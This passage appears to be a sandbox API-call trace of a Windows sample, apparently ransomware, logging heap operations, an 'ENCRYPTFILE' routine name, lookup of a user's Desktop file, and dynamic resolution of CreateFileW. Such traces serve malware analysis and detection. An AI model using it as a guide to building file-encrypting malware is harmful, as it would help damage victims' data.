[0133.924] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x19d20a8 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0133.924] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0133.924] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0133.924] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0133.925] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0133.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf838 | out: hHeap=0x1780000) returned 1 [0133.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e26d0 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a298 [0133.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5b0 | out: hHeap=0x1780000) returned 1 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0133.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0133.925] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc0) returned 0x1b22250 [0133.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a298 | out: hHeap=0x1780000) returned 1 [0133.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0133.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0133.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0133.925] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca700 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0133.926] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0133.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0133.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0133.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0133.926] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2600 [0133.926] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0133.926] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0133.926] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\M9-n.avi", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8dadc4a0, ftCreationTime.dwHighDateTime=0x1d5f0b5, ftLastAccessTime.dwLowDateTime=0xc976ad70, ftLastAccessTime.dwHighDateTime=0x1d5e747, ftLastWriteTime.dwLowDateTime=0xc976ad70, ftLastWriteTime.dwHighDateTime=0x1d5e747, nFileSizeHigh=0x0, nFileSizeLow=0xb5e4, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="M9-n.avi", cAlternateFileName="")) returned 0x41ac000 [0133.926] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0133.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0133.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0133.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0133.927] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0133.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0133.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2650 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0133.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5b0 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0133.927] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0133.927] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0133.928] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca760 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0133.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca778 | out: hHeap=0x1780000) returned 1 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392030 [0133.928] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0133.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392030 | out: hHeap=0x1780000) returned 1 [0133.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25c0 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0133.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25e0 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0133.928] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0133.928] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0133.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5e0 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0133.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0133.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc98 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0133.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0133.929] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2880 [0133.929] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0133.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392538 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0133.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0133.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0133.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0133.930] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0133.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0133.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0133.930] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb80 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0133.931] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf58 | out: hHeap=0x1780000) returned 1 [0133.931] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae08 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae50 | out: hHeap=0x1780000) returned 1 [0133.932] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0133.932] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x772d0000 [0133.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0133.933] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x43cae98, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae98 | out: hHeap=0x1780000) returned 1 [0133.933] GetProcAddress (hModule=0x772d0000, lpProcName="CreateFileW") returned 0x7733ed10 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf28 | out: hHeap=0x1780000) returned 1 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0133.933] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 